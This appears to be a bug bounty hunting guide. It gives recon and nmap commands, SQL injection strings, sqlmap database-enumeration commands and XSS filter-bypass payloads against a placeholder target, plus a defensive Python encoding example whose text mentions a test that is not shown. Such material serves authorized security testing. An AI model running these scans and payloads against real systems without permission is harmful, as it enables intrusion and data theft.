# Bug Bounty Program Specialist

Expert in vulnerability research and bug bounty hunting.
## Testing Methodology

### OWASP Top 10 Focus

- Injection (SQL, NoSQL, LDAP, OS commands)
- Broken Authentication
- Sensitive Data Exposure
- XML External Entities (XXE)
- Broken Access Control
- Security Misconfiguration
- Cross-Site Scripting (XSS)
- Insecure Deserialization
- Using Components with Known Vulnerabilities
- Insufficient Logging & Monitoring

### Effort Allocation

- Reconnaissance: 30%
- Manual testing: 50%
- Automated scanning: 20%

## Reconnaissance

### Subdomain Enumeration

```bash
# Passive enumeration
amass enum -passive -d target.com -o subdomains.txt

# Active enumeration
subfinder -d target.com -all -o subfinder.txt

# DNS brute force (gobuster output lines may carry a "Found: " prefix; strip it before merging)
gobuster dns -d target.com -w wordlist.txt -o gobuster.txt

# Merge and deduplicate results
cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt
```

### Technology Stack Identification

```bash
# Wappalyzer CLI
wappalyzer https://target.com

# WhatWeb (aggression level 3)
whatweb -a 3 https://target.com

# Nuclei technology detection
nuclei -u https://target.com -t technologies/
```

### Port Scanning

```bash
# Fast full-port scan (SYN scan and OS detection require root)
nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full

# Service scan with default scripts on common web ports
nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services
```

## SQL Injection Testing

### Manual Detection

```sql
-- Error-based
' OR '1'='1
' AND '1'='2
' UNION SELECT NULL--

-- Time-based blind
'; WAITFOR DELAY '00:00:05'--
' OR SLEEP(5)--

-- Boolean-based blind
' AND 1=1--
' AND 1=2--
```

### SQLMap

```bash
# Basic injection test
sqlmap -u "https://target.com/page?id=1" --batch

# With authentication
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch

# POST data
sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch

# Database enumeration
sqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch
```

## XSS Testing

### Payload Types

```javascript
// Reflected XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

// DOM-based XSS
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>

// Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>

// Stored XSS via different contexts
"><script>alert('XSS')</script>
'-alert('XSS')-'
</title><script>alert('XSS')</script>
```

### Context-Specific Payloads

```javascript
// In HTML attribute
" onfocus=alert('XSS') autofocus="
' onfocus=alert('XSS') autofocus='

// In JavaScript string
';alert('XSS');//
"-alert('XSS')-"

// In URL parameter
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
```
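The payload differs per context because the encoding that neutralizes it differs per context. The following Python is an added example, not code from the original page: it applies the correct treatment for each of the three contexts above (entity encoding for a quoted attribute, \uXXXX escaping for a JavaScript string literal, percent-encoding for a query parameter, and a scheme allow-list for an href, where encoding alone cannot help) and uses the page's own payloads as constructed sample input.

```python
import html
from urllib.parse import quote, urlsplit

# Constructed sample input: the three payloads from the section above.
ATTR_PAYLOAD = "\" onfocus=alert('XSS') autofocus=\""
JS_PAYLOAD = "';alert('XSS');//"
URL_PAYLOAD = "javascript:alert('XSS')"


def for_html_attribute(value):
    """Quoted HTML attribute context: encode the quotes that would close the attribute."""
    return html.escape(value, quote=True)


def for_js_string(value):
    """JavaScript string-literal context: every non-alphanumeric character becomes \\uXXXX,
    so quotes, ';' and '//' can neither terminate the literal nor start new code."""
    return "".join(c if c.isascii() and c.isalnum() else f"\\u{ord(c):04x}" for c in value)


def for_url_parameter(value):
    """Query-string context: percent-encode everything, including ':' and quotes."""
    return quote(value, safe="")


def safe_href(candidate):
    """href context: a javascript: or data: URL runs as-is however it is encoded,
    so only http(s) schemes are allowed and anything else becomes a harmless link."""
    scheme = urlsplit(candidate.strip()).scheme.lower()
    return candidate if scheme in ("http", "https") else "#"


def render_attribute(value):
    return f'<input value="{for_html_attribute(value)}">'


def render_js(value):
    return f"var q = '{for_js_string(value)}';"


def render_link(candidate):
    return f'<a href="{html.escape(safe_href(candidate), quote=True)}">link</a>'
```

The two `count` checks in the test are the point: after encoding, the attribute still has exactly two double quotes and the JS literal exactly two single quotes, so the injected delimiters never reach the parser as delimiters.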

## SSRF Testing

### Basic Payloads

- Localhost bypass
- Cloud metadata

### Detection Methods

```python
# Out-of-band detection using Burp Collaborator: a blind SSRF shows up as a
# DNS or HTTP hit on the collaborator host rather than in the application response.

# Webhook.site for testing
url = "https://webhook.site/unique-id"
```

## Report Writing

### Structure

```markdown
# Vulnerability Report

## Summary
[One-line description]

## Severity
[Critical/High/Medium/Low] - CVSS Score: X.X

## Affected Component
[URL/Endpoint/Feature]

## Description
[Detailed technical explanation]

## Steps to Reproduce
- [Step 1]
- [Step 2]
- [Step 3]

## Proof of Concept
[Screenshots, code, requests]

## Impact
[Business/technical impact]

## Remediation
[Specific recommendations]

## References
[CVE, OWASP, etc.]
```

### CVSS Calculator Factors

- Attack Vector (AV): Network/Adjacent/Local/Physical
- Attack Complexity (AC): Low/High
- Privileges Required (PR): None/Low/High
- User Interaction (UI): None/Required
- Scope (S): Unchanged/Changed
- Confidentiality Impact (C): None/Low/High
- Integrity Impact (I): None/Low/High
- Availability Impact (A): None/Low/High

## Tools Checklist

### Reconnaissance

- Amass / Subfinder
- Nmap
- Shodan
- Google Dorks

### Web Testing

- Burp Suite
- OWASP ZAP
- SQLMap
- Nuclei

### Automation

- ffuf (fuzzing)
- httpx (probing)
- waybackurls
- gau (URLs gathering)

## Ethical Guidelines

- Stay in scope: test only authorized targets
- Don't be destructive: avoid DoS and data loss
- Protect data: do not distribute data you find
- Report responsibly: follow the disclosure policy
- Document everything: keep detailed records
- Respect rate limits: do not overload systems

## Program Selection Strategy

### Criteria

- Response time history
- Bounty amounts
- Scope breadth
- Program maturity
- Community feedback

### Priority Matrix

| Program Type | Skill Level | Potential |
|---|---|---|
| New programs | Any | High |
| Broad scope | Intermediate | Medium |
| Narrow scope | Expert | Low-Medium |
| VDP only | Beginner | Low |